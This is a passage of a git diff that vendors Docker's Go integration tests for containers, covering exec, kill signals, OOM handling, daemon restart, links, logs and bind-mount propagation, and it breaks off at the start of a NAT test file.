+		assert.DeepEqual(t, expected, rops)
+	}
+
+	for i, tc := range testCases {
+		name := fmt.Sprintf("create-readonly-paths-%d", i)
+		config := container.Config{
+			Image: "busybox",
+			Cmd:   []string{"true"},
+		}
+		hc := container.HostConfig{}
+		if tc.readonlyPaths != nil {
+			hc.ReadonlyPaths = tc.readonlyPaths
+		}
+
+		// Create the container.
+		c, err := client.ContainerCreate(context.Background(),
+			&config,
+			&hc,
+			&network.NetworkingConfig{},
+			name,
+		)
+		assert.NilError(t, err)
+
+		checkInspect(t, ctx, name, tc.expected)
+
+		// Start the container.
+		err = client.ContainerStart(ctx, c.ID, types.ContainerStartOptions{})
+		assert.NilError(t, err)
+
+		poll.WaitOn(t, ctr.IsInState(ctx, client, c.ID, "exited"), poll.WithDelay(100*time.Millisecond))
+
+		checkInspect(t, ctx, name, tc.expected)
+	}
+}
diff --git a/vendor/github.com/docker/docker/integration/container/daemon_linux_test.go b/vendor/github.com/docker/docker/integration/container/daemon_linux_test.go
new file mode 100644
index 0000000000..bc5c5076b8
--- /dev/null
+++ b/vendor/github.com/docker/docker/integration/container/daemon_linux_test.go
@@ -0,0 +1,78 @@
+package container // import "github.com/docker/docker/integration/container"
+
+import (
+	"context"
+	"fmt"
+	"io/ioutil"
+	"strconv"
+	"strings"
+	"testing"
+
+	"github.com/docker/docker/api/types"
+	"github.com/docker/docker/integration/internal/container"
+	"github.com/docker/docker/internal/test/daemon"
+	"golang.org/x/sys/unix"
+	"gotest.tools/assert"
+	"gotest.tools/skip"
+)
+
+// This is a regression test for #36145
+// It ensures that a container can be started when the daemon was improperly
+// shutdown when the daemon is brought back up.
+//
+// The regression is due to improper error handling preventing a container from
+// being restored and as such have the resources cleaned up.
+//
+// To test this, we need to kill dockerd, then kill both the containerd-shim and
+// the container process, then start dockerd back up and attempt to start the
+// container again.
+func TestContainerStartOnDaemonRestart(t *testing.T) {
+	skip.If(t, testEnv.IsRemoteDaemon, "cannot start daemon on remote test run")
+	t.Parallel()
+
+	d := daemon.New(t)
+	d.StartWithBusybox(t, "--iptables=false")
+	defer d.Stop(t)
+
+	client, err := d.NewClient()
+	assert.Check(t, err, "error creating client")
+
+	ctx := context.Background()
+
+	cID := container.Create(t, ctx, client)
+	defer client.ContainerRemove(ctx, cID, types.ContainerRemoveOptions{Force: true})
+
+	err = client.ContainerStart(ctx, cID, types.ContainerStartOptions{})
+	assert.Check(t, err, "error starting test container")
+
+	inspect, err := client.ContainerInspect(ctx, cID)
+	assert.Check(t, err, "error getting inspect data")
+
+	ppid := getContainerdShimPid(t, inspect)
+
+	err = d.Kill()
+	assert.Check(t, err, "failed to kill test daemon")
+
+	err = unix.Kill(inspect.State.Pid, unix.SIGKILL)
+	assert.Check(t, err, "failed to kill container process")
+
+	err = unix.Kill(ppid, unix.SIGKILL)
+	assert.Check(t, err, "failed to kill containerd-shim")
+
+	d.Start(t, "--iptables=false")
+
+	err = client.ContainerStart(ctx, cID, types.ContainerStartOptions{})
+	assert.Check(t, err, "failed to start test container")
+}
+
+func getContainerdShimPid(t *testing.T, c types.ContainerJSON) int {
+	statB, err := ioutil.ReadFile(fmt.Sprintf("/proc/%d/stat", c.State.Pid))
+	assert.Check(t, err, "error looking up containerd-shim pid")
+
+	// ppid is the 4th entry in `/proc/pid/stat`
+	ppid, err := strconv.Atoi(strings.Fields(string(statB))[3])
+	assert.Check(t, err, "error converting ppid field to int")
+
+	assert.Check(t, ppid != 1, "got unexpected ppid")
+	return ppid
+}
diff --git a/vendor/github.com/docker/docker/integration/container/diff_test.go b/vendor/github.com/docker/docker/integration/container/diff_test.go
new file mode 100644
index 0000000000..b4219c3627
--- /dev/null
+++ b/vendor/github.com/docker/docker/integration/container/diff_test.go
@@ -0,0 +1,42 @@
+package container // import "github.com/docker/docker/integration/container"
+
+import (
+	"context"
+	"testing"
+	"time"
+
+	containertypes "github.com/docker/docker/api/types/container"
+	"github.com/docker/docker/integration/internal/container"
+	"github.com/docker/docker/internal/test/request"
+	"github.com/docker/docker/pkg/archive"
+	"gotest.tools/assert"
+	"gotest.tools/poll"
+)
+
+func TestDiff(t *testing.T) {
+	defer setupTest(t)()
+	client := request.NewAPIClient(t)
+	ctx := context.Background()
+
+	cID := container.Run(t, ctx, client, container.WithCmd("sh", "-c", `mkdir /foo; echo xyzzy > /foo/bar`))
+
+	// Wait for it to exit as cannot diff a running container on Windows, and
+	// it will take a few seconds to exit. Also there's no way in Windows to
+	// differentiate between an Add or a Modify, and all files are under
+	// a "Files/" prefix.
+	expected := []containertypes.ContainerChangeResponseItem{
+		{Kind: archive.ChangeAdd, Path: "/foo"},
+		{Kind: archive.ChangeAdd, Path: "/foo/bar"},
+	}
+	if testEnv.OSType == "windows" {
+		poll.WaitOn(t, container.IsInState(ctx, client, cID, "exited"), poll.WithDelay(100*time.Millisecond), poll.WithTimeout(60*time.Second))
+		expected = []containertypes.ContainerChangeResponseItem{
+			{Kind: archive.ChangeModify, Path: "Files/foo"},
+			{Kind: archive.ChangeModify, Path: "Files/foo/bar"},
+		}
+	}
+
+	items, err := client.ContainerDiff(ctx, cID)
+	assert.NilError(t, err)
+	assert.DeepEqual(t, expected, items)
+}
diff --git a/vendor/github.com/docker/docker/integration/container/exec_test.go b/vendor/github.com/docker/docker/integration/container/exec_test.go
new file mode 100644
index 0000000000..85f9e05915
--- /dev/null
+++ b/vendor/github.com/docker/docker/integration/container/exec_test.go
@@ -0,0 +1,50 @@
+package container // import "github.com/docker/docker/integration/container"
+
+import (
+	"context"
+	"io/ioutil"
+	"testing"
+
+	"github.com/docker/docker/api/types"
+	"github.com/docker/docker/api/types/strslice"
+	"github.com/docker/docker/api/types/versions"
+	"github.com/docker/docker/integration/internal/container"
+	"github.com/docker/docker/internal/test/request"
+	"gotest.tools/assert"
+	is "gotest.tools/assert/cmp"
+	"gotest.tools/skip"
+)
+
+func TestExec(t *testing.T) {
+	skip.If(t, versions.LessThan(testEnv.DaemonAPIVersion(), "1.35"), "broken in earlier versions")
+	defer setupTest(t)()
+	ctx := context.Background()
+	client := request.NewAPIClient(t)
+
+	cID := container.Run(t, ctx, client, container.WithTty(true), container.WithWorkingDir("/root"))
+
+	id, err := client.ContainerExecCreate(ctx, cID,
+		types.ExecConfig{
+			WorkingDir:   "/tmp",
+			Env:          strslice.StrSlice([]string{"FOO=BAR"}),
+			AttachStdout: true,
+			Cmd:          strslice.StrSlice([]string{"sh", "-c", "env"}),
+		},
+	)
+	assert.NilError(t, err)
+
+	resp, err := client.ContainerExecAttach(ctx, id.ID,
+		types.ExecStartCheck{
+			Detach: false,
+			Tty:    false,
+		},
+	)
+	assert.NilError(t, err)
+	defer resp.Close()
+	r, err := ioutil.ReadAll(resp.Reader)
+	assert.NilError(t, err)
+	out := string(r)
+	assert.NilError(t, err)
+	assert.Assert(t, is.Contains(out, "PWD=/tmp"), "exec command not running in expected /tmp working directory")
+	assert.Assert(t, is.Contains(out, "FOO=BAR"), "exec command not running with expected environment variable FOO")
+}
diff --git a/vendor/github.com/docker/docker/integration/container/export_test.go b/vendor/github.com/docker/docker/integration/container/export_test.go
new file mode 100644
index 0000000000..7a9ed0aa99
--- /dev/null
+++ b/vendor/github.com/docker/docker/integration/container/export_test.go
@@ -0,0 +1,78 @@
+package container // import "github.com/docker/docker/integration/container"
+
+import (
+	"context"
+	"encoding/json"
+	"testing"
+	"time"
+
+	"github.com/docker/docker/api/types"
+	"github.com/docker/docker/api/types/filters"
+	"github.com/docker/docker/integration/internal/container"
+	"github.com/docker/docker/internal/test/daemon"
+	"github.com/docker/docker/internal/test/request"
+	"github.com/docker/docker/pkg/jsonmessage"
+	"gotest.tools/assert"
+	is "gotest.tools/assert/cmp"
+	"gotest.tools/poll"
+	"gotest.tools/skip"
+)
+
+// export an image and try to import it into a new one
+func TestExportContainerAndImportImage(t *testing.T) {
+	skip.If(t, testEnv.DaemonInfo.OSType != "linux")
+
+	defer setupTest(t)()
+	client := request.NewAPIClient(t)
+	ctx := context.Background()
+
+	cID := container.Run(t, ctx, client, container.WithCmd("true"))
+	poll.WaitOn(t, container.IsStopped(ctx, client, cID), poll.WithDelay(100*time.Millisecond))
+
+	reference := "repo/testexp:v1"
+	exportResp, err := client.ContainerExport(ctx, cID)
+	assert.NilError(t, err)
+	importResp, err := client.ImageImport(ctx, types.ImageImportSource{
+		Source:     exportResp,
+		SourceName: "-",
+	}, reference, types.ImageImportOptions{})
+	assert.NilError(t, err)
+
+	// If the import is successfully, then the message output should contain
+	// the image ID and match with the output from `docker images`.
+
+	dec := json.NewDecoder(importResp)
+	var jm jsonmessage.JSONMessage
+	err = dec.Decode(&jm)
+	assert.NilError(t, err)
+
+	images, err := client.ImageList(ctx, types.ImageListOptions{
+		Filters: filters.NewArgs(filters.Arg("reference", reference)),
+	})
+	assert.NilError(t, err)
+	assert.Check(t, is.Equal(jm.Status, images[0].ID))
+}
+
+// TestExportContainerAfterDaemonRestart checks that a container
+// created before start of the currently running dockerd
+// can be exported (as reported in #36561). To satisfy this
+// condition, daemon restart is needed after container creation.
+func TestExportContainerAfterDaemonRestart(t *testing.T) {
+	skip.If(t, testEnv.DaemonInfo.OSType != "linux")
+	skip.If(t, testEnv.IsRemoteDaemon())
+
+	d := daemon.New(t)
+	client, err := d.NewClient()
+	assert.NilError(t, err)
+
+	d.StartWithBusybox(t)
+	defer d.Stop(t)
+
+	ctx := context.Background()
+	ctrID := container.Create(t, ctx, client)
+
+	d.Restart(t)
+
+	_, err = client.ContainerExport(ctx, ctrID)
+	assert.NilError(t, err)
+}
diff --git a/vendor/github.com/docker/docker/integration/container/health_test.go b/vendor/github.com/docker/docker/integration/container/health_test.go
new file mode 100644
index 0000000000..7cc196e46d
--- /dev/null
+++ b/vendor/github.com/docker/docker/integration/container/health_test.go
@@ -0,0 +1,47 @@
+package container // import "github.com/docker/docker/integration/container"
+
+import (
+	"context"
+	"testing"
+	"time"
+
+	"github.com/docker/docker/api/types"
+	containertypes "github.com/docker/docker/api/types/container"
+	"github.com/docker/docker/client"
+	"github.com/docker/docker/integration/internal/container"
+	"github.com/docker/docker/internal/test/request"
+	"gotest.tools/poll"
+)
+
+// TestHealthCheckWorkdir verifies that health-checks inherit the containers'
+// working-dir.
+func TestHealthCheckWorkdir(t *testing.T) {
+	defer setupTest(t)()
+	ctx := context.Background()
+	client := request.NewAPIClient(t)
+
+	cID := container.Run(t, ctx, client, container.WithTty(true), container.WithWorkingDir("/foo"), func(c *container.TestContainerConfig) {
+		c.Config.Healthcheck = &containertypes.HealthConfig{
+			Test:     []string{"CMD-SHELL", "if [ \"$PWD\" = \"/foo\" ]; then exit 0; else exit 1; fi;"},
+			Interval: 50 * time.Millisecond,
+			Retries:  3,
+		}
+	})
+
+	poll.WaitOn(t, pollForHealthStatus(ctx, client, cID, types.Healthy), poll.WithDelay(100*time.Millisecond))
+}
+
+func pollForHealthStatus(ctx context.Context, client client.APIClient, containerID string, healthStatus string) func(log poll.LogT) poll.Result {
+	return func(log poll.LogT) poll.Result {
+		inspect, err := client.ContainerInspect(ctx, containerID)
+
+		switch {
+		case err != nil:
+			return poll.Error(err)
+		case inspect.State.Health.Status == healthStatus:
+			return poll.Success()
+		default:
+			return poll.Continue("waiting for container to become %s", healthStatus)
+		}
+	}
+}
diff --git a/vendor/github.com/docker/docker/integration/container/inspect_test.go b/vendor/github.com/docker/docker/integration/container/inspect_test.go
new file mode 100644
index 0000000000..d034c53650
--- /dev/null
+++ b/vendor/github.com/docker/docker/integration/container/inspect_test.go
@@ -0,0 +1,48 @@
+package container // import "github.com/docker/docker/integration/container"
+
+import (
+	"context"
+	"encoding/json"
+	"testing"
+	"time"
+
+	"github.com/docker/docker/client"
+	"github.com/docker/docker/integration/internal/container"
+	"github.com/docker/docker/internal/test/request"
+	"gotest.tools/assert"
+	is "gotest.tools/assert/cmp"
+	"gotest.tools/poll"
+	"gotest.tools/skip"
+)
+
+func TestInspectCpusetInConfigPre120(t *testing.T) {
+	skip.If(t, testEnv.DaemonInfo.OSType != "linux" || !testEnv.DaemonInfo.CPUSet)
+
+	defer setupTest(t)()
+	client := request.NewAPIClient(t, client.WithVersion("1.19"))
+	ctx := context.Background()
+
+	name := "cpusetinconfig-pre120-" + t.Name()
+	// Create container with up to-date-API
+	container.Run(t, ctx, request.NewAPIClient(t), container.WithName(name),
+		container.WithCmd("true"),
+		func(c *container.TestContainerConfig) {
+			c.HostConfig.Resources.CpusetCpus = "0"
+		},
+	)
+	poll.WaitOn(t, container.IsInState(ctx, client, name, "exited"), poll.WithDelay(100*time.Millisecond))
+
+	_, body, err := client.ContainerInspectWithRaw(ctx, name, false)
+	assert.NilError(t, err)
+
+	var inspectJSON map[string]interface{}
+	err = json.Unmarshal(body, &inspectJSON)
+	assert.NilError(t, err, "unable to unmarshal body for version 1.19: %s", err)
+
+	config, ok := inspectJSON["Config"]
+	assert.Check(t, is.Equal(true, ok), "Unable to find 'Config'")
+
+	cfg := config.(map[string]interface{})
+	_, ok = cfg["Cpuset"]
+	assert.Check(t, is.Equal(true, ok), "API version 1.19 expected to include Cpuset in 'Config'")
+}
diff --git a/vendor/github.com/docker/docker/integration/container/kill_test.go b/vendor/github.com/docker/docker/integration/container/kill_test.go
new file mode 100644
index 0000000000..12a9083cf3
--- /dev/null
+++ b/vendor/github.com/docker/docker/integration/container/kill_test.go
@@ -0,0 +1,183 @@
+package container // import "github.com/docker/docker/integration/container"
+
+import (
+	"context"
+	"testing"
+	"time"
+
+	containertypes "github.com/docker/docker/api/types/container"
+	"github.com/docker/docker/client"
+	"github.com/docker/docker/integration/internal/container"
+	"github.com/docker/docker/internal/test/request"
+	"gotest.tools/assert"
+	is "gotest.tools/assert/cmp"
+	"gotest.tools/poll"
+	"gotest.tools/skip"
+)
+
+func TestKillContainerInvalidSignal(t *testing.T) {
+	defer setupTest(t)()
+	client := request.NewAPIClient(t)
+	ctx := context.Background()
+	id := container.Run(t, ctx, client)
+
+	err := client.ContainerKill(ctx, id, "0")
+	assert.Error(t, err, "Error response from daemon: Invalid signal: 0")
+	poll.WaitOn(t, container.IsInState(ctx, client, id, "running"), poll.WithDelay(100*time.Millisecond))
+
+	err = client.ContainerKill(ctx, id, "SIG42")
+	assert.Error(t, err, "Error response from daemon: Invalid signal: SIG42")
+	poll.WaitOn(t, container.IsInState(ctx, client, id, "running"), poll.WithDelay(100*time.Millisecond))
+}
+
+func TestKillContainer(t *testing.T) {
+	defer setupTest(t)()
+	client := request.NewAPIClient(t)
+
+	testCases := []struct {
+		doc    string
+		signal string
+		status string
+	}{
+		{
+			doc:    "no signal",
+			signal: "",
+			status: "exited",
+		},
+		{
+			doc:    "non killing signal",
+			signal: "SIGWINCH",
+			status: "running",
+		},
+		{
+			doc:    "killing signal",
+			signal: "SIGTERM",
+			status: "exited",
+		},
+	}
+
+	for _, tc := range testCases {
+		tc := tc
+		t.Run(tc.doc, func(t *testing.T) {
+			ctx := context.Background()
+			id := container.Run(t, ctx, client)
+			err := client.ContainerKill(ctx, id, tc.signal)
+			assert.NilError(t, err)
+
+			poll.WaitOn(t, container.IsInState(ctx, client, id, tc.status), poll.WithDelay(100*time.Millisecond))
+		})
+	}
+}
+
+func TestKillWithStopSignalAndRestartPolicies(t *testing.T) {
+	skip.If(t, testEnv.OSType != "linux", "Windows only supports 1.25 or later")
+	defer setupTest(t)()
+	client := request.NewAPIClient(t)
+
+	testCases := []struct {
+		doc        string
+		stopsignal string
+		status     string
+	}{
+		{
+			doc:        "same-signal-disables-restart-policy",
+			stopsignal: "TERM",
+			status:     "exited",
+		},
+		{
+			doc:        "different-signal-keep-restart-policy",
+			stopsignal: "CONT",
+			status:     "running",
+		},
+	}
+
+	for _, tc := range testCases {
+		tc := tc
+		t.Run(tc.doc, func(t *testing.T) {
+			ctx := context.Background()
+			id := container.Run(t, ctx, client, func(c *container.TestContainerConfig) {
+				c.Config.StopSignal = tc.stopsignal
+				c.HostConfig.RestartPolicy = containertypes.RestartPolicy{
+					Name: "always",
+				}
+			})
+			err := client.ContainerKill(ctx, id, "TERM")
+			assert.NilError(t, err)
+
+			poll.WaitOn(t, container.IsInState(ctx, client, id, tc.status), poll.WithDelay(100*time.Millisecond))
+		})
+	}
+}
+
+func TestKillStoppedContainer(t *testing.T) {
+	skip.If(t, testEnv.OSType != "linux") // Windows only supports 1.25 or later
+	defer setupTest(t)()
+	ctx := context.Background()
+	client := request.NewAPIClient(t)
+	id := container.Create(t, ctx, client)
+	err := client.ContainerKill(ctx, id, "SIGKILL")
+	assert.Assert(t, is.ErrorContains(err, ""))
+	assert.Assert(t, is.Contains(err.Error(), "is not running"))
+}
+
+func TestKillStoppedContainerAPIPre120(t *testing.T) {
+	skip.If(t, testEnv.OSType != "linux") // Windows only supports 1.25 or later
+	defer setupTest(t)()
+	ctx := context.Background()
+	client := request.NewAPIClient(t, client.WithVersion("1.19"))
+	id := container.Create(t, ctx, client)
+	err := client.ContainerKill(ctx, id, "SIGKILL")
+	assert.NilError(t, err)
+}
+
+func TestKillDifferentUserContainer(t *testing.T) {
+	// TODO Windows: Windows does not yet support -u (Feb 2016).
+	skip.If(t, testEnv.OSType != "linux", "User containers (container.Config.User) are not yet supported on %q platform", testEnv.OSType)
+
+	defer setupTest(t)()
+	ctx := context.Background()
+	client := request.NewAPIClient(t, client.WithVersion("1.19"))
+
+	id := container.Run(t, ctx, client, func(c *container.TestContainerConfig) {
+		c.Config.User = "daemon"
+	})
+	poll.WaitOn(t, container.IsInState(ctx, client, id, "running"), poll.WithDelay(100*time.Millisecond))
+
+	err := client.ContainerKill(ctx, id, "SIGKILL")
+	assert.NilError(t, err)
+	poll.WaitOn(t, container.IsInState(ctx, client, id, "exited"), poll.WithDelay(100*time.Millisecond))
+}
+
+func TestInspectOomKilledTrue(t *testing.T) {
+	skip.If(t, testEnv.DaemonInfo.OSType != "linux" || !testEnv.DaemonInfo.MemoryLimit || !testEnv.DaemonInfo.SwapLimit)
+
+	defer setupTest(t)()
+	ctx := context.Background()
+	client := request.NewAPIClient(t)
+
+	cID := container.Run(t, ctx, client, container.WithCmd("sh", "-c", "x=a; while true; do x=$x$x$x$x; done"), func(c *container.TestContainerConfig) {
+		c.HostConfig.Resources.Memory = 32 * 1024 * 1024
+	})
+
+	poll.WaitOn(t, container.IsInState(ctx, client, cID, "exited"), poll.WithDelay(100*time.Millisecond))
+
+	inspect, err := client.ContainerInspect(ctx, cID)
+	assert.NilError(t, err)
+	assert.Check(t, is.Equal(true, inspect.State.OOMKilled))
+}
+
+func TestInspectOomKilledFalse(t *testing.T) {
+	skip.If(t, testEnv.DaemonInfo.OSType != "linux" || !testEnv.DaemonInfo.MemoryLimit || !testEnv.DaemonInfo.SwapLimit)
+
+	defer setupTest(t)()
+	ctx := context.Background()
+	client := request.NewAPIClient(t)
+
+	cID := container.Run(t, ctx, client, container.WithCmd("sh", "-c", "echo hello world"))
+
+	poll.WaitOn(t, container.IsInState(ctx, client, cID, "exited"), poll.WithDelay(100*time.Millisecond))
+
+	inspect, err := client.ContainerInspect(ctx, cID)
+	assert.NilError(t, err)
+	assert.Check(t, is.Equal(false, inspect.State.OOMKilled))
+}
diff --git a/vendor/github.com/docker/docker/integration/container/links_linux_test.go b/vendor/github.com/docker/docker/integration/container/links_linux_test.go
new file mode 100644
index 0000000000..f9f3cbe5ed
--- /dev/null
+++ b/vendor/github.com/docker/docker/integration/container/links_linux_test.go
@@ -0,0 +1,57 @@
+package container // import "github.com/docker/docker/integration/container"
+
+import (
+	"context"
+	"io/ioutil"
+	"os"
+	"testing"
+
+	"github.com/docker/docker/api/types"
+	"github.com/docker/docker/api/types/filters"
+	"github.com/docker/docker/integration/internal/container"
+	"github.com/docker/docker/internal/test/request"
+	"gotest.tools/assert"
+	is "gotest.tools/assert/cmp"
+	"gotest.tools/skip"
+)
+
+func TestLinksEtcHostsContentMatch(t *testing.T) {
+	skip.If(t, testEnv.IsRemoteDaemon())
+
+	hosts, err := ioutil.ReadFile("/etc/hosts")
+	skip.If(t, os.IsNotExist(err))
+
+	defer setupTest(t)()
+	client := request.NewAPIClient(t)
+	ctx := context.Background()
+
+	cID := container.Run(t, ctx, client, container.WithNetworkMode("host"))
+	res, err := container.Exec(ctx, client, cID, []string{"cat", "/etc/hosts"})
+	assert.NilError(t, err)
+	assert.Assert(t, is.Len(res.Stderr(), 0))
+	assert.Equal(t, 0, res.ExitCode)
+
+	assert.Check(t, is.Equal(string(hosts), res.Stdout()))
+}
+
+func TestLinksContainerNames(t *testing.T) {
+	skip.If(t, testEnv.DaemonInfo.OSType != "linux")
+
+	defer setupTest(t)()
+	client := request.NewAPIClient(t)
+	ctx := context.Background()
+
+	containerA := "first_" + t.Name()
+	containerB := "second_" + t.Name()
+	container.Run(t, ctx, client, container.WithName(containerA))
+	container.Run(t, ctx, client, container.WithName(containerB), container.WithLinks(containerA+":"+containerA))
+
+	f := filters.NewArgs(filters.Arg("name", containerA))
+
+	containers, err := client.ContainerList(ctx, types.ContainerListOptions{
+		Filters: f,
+	})
+	assert.NilError(t, err)
+	assert.Check(t, is.Equal(1, len(containers)))
+	assert.Check(t, is.DeepEqual([]string{"/" + containerA, "/" + containerB + "/" + containerA}, containers[0].Names))
+}
diff --git a/vendor/github.com/docker/docker/integration/container/logs_test.go b/vendor/github.com/docker/docker/integration/container/logs_test.go
new file mode 100644
index 0000000000..68fbe13a73
--- /dev/null
+++ b/vendor/github.com/docker/docker/integration/container/logs_test.go
@@ -0,0 +1,35 @@
+package container // import "github.com/docker/docker/integration/container"
+
+import (
+	"context"
+	"io/ioutil"
+	"testing"
+
+	"github.com/docker/docker/api/types"
+	"github.com/docker/docker/integration/internal/container"
+	"github.com/docker/docker/internal/test/request"
+	"github.com/docker/docker/pkg/stdcopy"
+	"gotest.tools/assert"
+	"gotest.tools/skip"
+)
+
+// Regression test for #35370
+// Makes sure that when following we don't get an EOF error when there are no logs
+func TestLogsFollowTailEmpty(t *testing.T) {
+	// FIXME(vdemeester) fails on a e2e run on linux...
+	skip.If(t, testEnv.IsRemoteDaemon())
+	defer setupTest(t)()
+	client := request.NewAPIClient(t)
+	ctx := context.Background()
+
+	id := container.Run(t, ctx, client, container.WithCmd("sleep", "100000"))
+
+	logs, err := client.ContainerLogs(ctx, id, types.ContainerLogsOptions{ShowStdout: true, Tail: "2"})
+	if logs != nil {
+		defer logs.Close()
+	}
+	assert.Check(t, err)
+
+	_, err = stdcopy.StdCopy(ioutil.Discard, ioutil.Discard, logs)
+	assert.Check(t, err)
+}
diff --git a/vendor/github.com/docker/docker/integration/container/main_test.go b/vendor/github.com/docker/docker/integration/container/main_test.go
new file mode 100644
index 0000000000..fb87fddcc2
--- /dev/null
+++ b/vendor/github.com/docker/docker/integration/container/main_test.go
@@ -0,0 +1,33 @@
+package container // import "github.com/docker/docker/integration/container"
+
+import (
+	"fmt"
+	"os"
+	"testing"
+
+	"github.com/docker/docker/internal/test/environment"
+)
+
+var testEnv *environment.Execution
+
+func TestMain(m *testing.M) {
+	var err error
+	testEnv, err = environment.New()
+	if err != nil {
+		fmt.Println(err)
+		os.Exit(1)
+	}
+	err = environment.EnsureFrozenImagesLinux(testEnv)
+	if err != nil {
+		fmt.Println(err)
+		os.Exit(1)
+	}
+
+	testEnv.Print()
+	os.Exit(m.Run())
+}
+
+func setupTest(t *testing.T) func() {
+	environment.ProtectAll(t, testEnv)
+	return func() { testEnv.Clean(t) }
+}
diff --git a/vendor/github.com/docker/docker/integration/container/mounts_linux_test.go b/vendor/github.com/docker/docker/integration/container/mounts_linux_test.go
new file mode 100644
index 0000000000..a0a8836c51
--- /dev/null
+++ b/vendor/github.com/docker/docker/integration/container/mounts_linux_test.go
@@ -0,0 +1,208 @@
+package container // import "github.com/docker/docker/integration/container"
+
+import (
+	"context"
+	"fmt"
+	"path/filepath"
+	"testing"
+
+	"github.com/docker/docker/api/types"
+	"github.com/docker/docker/api/types/container"
+	"github.com/docker/docker/api/types/mount"
+	"github.com/docker/docker/api/types/network"
+	"github.com/docker/docker/client"
+	"github.com/docker/docker/internal/test/request"
+	"github.com/docker/docker/pkg/system"
+	"gotest.tools/assert"
+	is "gotest.tools/assert/cmp"
+	"gotest.tools/fs"
+	"gotest.tools/skip"
+)
+
+func TestContainerNetworkMountsNoChown(t *testing.T) {
+	// chown only applies to Linux bind mounted volumes; must be same host to verify
+	skip.If(t, testEnv.DaemonInfo.OSType != "linux" || testEnv.IsRemoteDaemon())
+
+	defer setupTest(t)()
+
+	ctx := context.Background()
+
+	tmpDir := fs.NewDir(t, "network-file-mounts", fs.WithMode(0755), fs.WithFile("nwfile", "network file bind mount", fs.WithMode(0644)))
+	defer tmpDir.Remove()
+
+	tmpNWFileMount := tmpDir.Join("nwfile")
+
+	config := container.Config{
+		Image: "busybox",
+	}
+	hostConfig := container.HostConfig{
+		Mounts: []mount.Mount{
+			{
+				Type:   "bind",
+				Source: tmpNWFileMount,
+				Target: "/etc/resolv.conf",
+			},
+			{
+				Type:   "bind",
+				Source: tmpNWFileMount,
+				Target: "/etc/hostname",
+			},
+			{
+				Type:   "bind",
+				Source: tmpNWFileMount,
+				Target: "/etc/hosts",
+			},
+		},
+	}
+
+	cli, err := client.NewEnvClient()
+	assert.NilError(t, err)
+	defer cli.Close()
+
+	ctrCreate, err := cli.ContainerCreate(ctx, &config, &hostConfig, &network.NetworkingConfig{}, "")
+	assert.NilError(t, err)
+	// container will exit immediately because of no tty, but we only need the start sequence to test the condition
+	err = cli.ContainerStart(ctx, ctrCreate.ID, types.ContainerStartOptions{})
+	assert.NilError(t, err)
+
+	// Check that host-located bind mount network file did not change ownership when the container was started
+	// Note: If the user specifies a mountpath from the host, we should not be
+	// attempting to chown files outside the daemon's metadata directory
+	// (represented by `daemon.repository` at init time).
+	// This forces users who want to use user namespaces to handle the
+	// ownership needs of any external files mounted as network files
+	// (/etc/resolv.conf, /etc/hosts, /etc/hostname) separately from the
+	// daemon. In all other volume/bind mount situations we have taken this
+	// same line--we don't chown host file content.
+	// See GitHub PR 34224 for details.
+	statT, err := system.Stat(tmpNWFileMount)
+	assert.NilError(t, err)
+	assert.Check(t, is.Equal(uint32(0), statT.UID()), "bind mounted network file should not change ownership from root")
+}
+
+func TestMountDaemonRoot(t *testing.T) {
+	skip.If(t, testEnv.DaemonInfo.OSType != "linux" || testEnv.IsRemoteDaemon())
+	t.Parallel()
+
+	client := request.NewAPIClient(t)
+	ctx := context.Background()
+	info, err := client.Info(ctx)
+	if err != nil {
+		t.Fatal(err)
+	}
+
+	for _, test := range []struct {
+		desc        string
+		propagation mount.Propagation
+		expected    mount.Propagation
+	}{
+		{
+			desc:        "default",
+			propagation: "",
+			expected:    mount.PropagationRSlave,
+		},
+		{
+			desc:        "private",
+			propagation: mount.PropagationPrivate,
+		},
+		{
+			desc:        "rprivate",
+			propagation: mount.PropagationRPrivate,
+		},
+		{
+			desc:        "slave",
+			propagation: mount.PropagationSlave,
+		},
+		{
+			desc:        "rslave",
+			propagation: mount.PropagationRSlave,
+			expected:    mount.PropagationRSlave,
+		},
+		{
+			desc:        "shared",
+			propagation: mount.PropagationShared,
+		},
+		{
+			desc:        "rshared",
+			propagation: mount.PropagationRShared,
+			expected:    mount.PropagationRShared,
+		},
+	} {
+		t.Run(test.desc, func(t *testing.T) {
+			test := test
+			t.Parallel()
+
+			propagationSpec := fmt.Sprintf(":%s", test.propagation)
+			if test.propagation == "" {
+				propagationSpec = ""
+			}
+			bindSpecRoot := info.DockerRootDir + ":" + "/foo" + propagationSpec
+			bindSpecSub := filepath.Join(info.DockerRootDir, "containers") + ":/foo" + propagationSpec
+
+			for name, hc := range map[string]*container.HostConfig{
+				"bind root":    {Binds: []string{bindSpecRoot}},
+				"bind subpath": {Binds: []string{bindSpecSub}},
+				"mount root": {
+					Mounts: []mount.Mount{
+						{
+							Type:        mount.TypeBind,
+							Source:      info.DockerRootDir,
+							Target:      "/foo",
+							BindOptions: &mount.BindOptions{Propagation: test.propagation},
+						},
+					},
+				},
+				"mount subpath": {
+					Mounts: []mount.Mount{
+						{
+							Type:        mount.TypeBind,
+							Source:      filepath.Join(info.DockerRootDir, "containers"),
+							Target:      "/foo",
+							BindOptions: &mount.BindOptions{Propagation: test.propagation},
+						},
+					},
+				},
+			} {
+				t.Run(name, func(t *testing.T) {
+					hc := hc
+					t.Parallel()
+
+					c, err := client.ContainerCreate(ctx, &container.Config{
+						Image: "busybox",
+						Cmd:   []string{"true"},
+					}, hc, nil, "")
+
+					if err != nil {
+						if test.expected != "" {
+							t.Fatal(err)
+						}
+						// expected an error, so this is ok and should not continue
+						return
+					}
+					if test.expected == "" {
+						t.Fatal("expected create to fail")
+					}
+
+					defer func() {
+						if err := client.ContainerRemove(ctx, c.ID, types.ContainerRemoveOptions{Force: true}); err != nil {
+							panic(err)
+						}
+					}()
+
+					inspect, err := client.ContainerInspect(ctx, c.ID)
+					if err != nil {
+						t.Fatal(err)
+					}
+					if len(inspect.Mounts) != 1 {
+						t.Fatalf("unexpected number of mounts: %+v", inspect.Mounts)
+					}
+
+					m := inspect.Mounts[0]
+					if m.Propagation != test.expected {
+						t.Fatalf("got unexpected propagation mode, expected %q, got: %v", test.expected, m.Propagation)
+					}
+				})
+			}
+		})
+	}
+}
diff --git a/vendor/github.com/docker/docker/integration/container/nat_test.go b/vendor/github.com/docker/docker/integration/container/nat_test.go
new file mode 100644
index 0000000000..0dbed897db
--- /dev/null
+++ b/vendor/github.com/docker/docker/integration/container/nat_test.go
@@ -0,0 +1,120 @@
+package container // import "github.com/docker/docker/integration/container"
+
+import (
+	"bytes"
+	"context"
+	"fmt"
+	"io"
+	"io/ioutil"
+	"net"
+	"strings"
+	"testing"
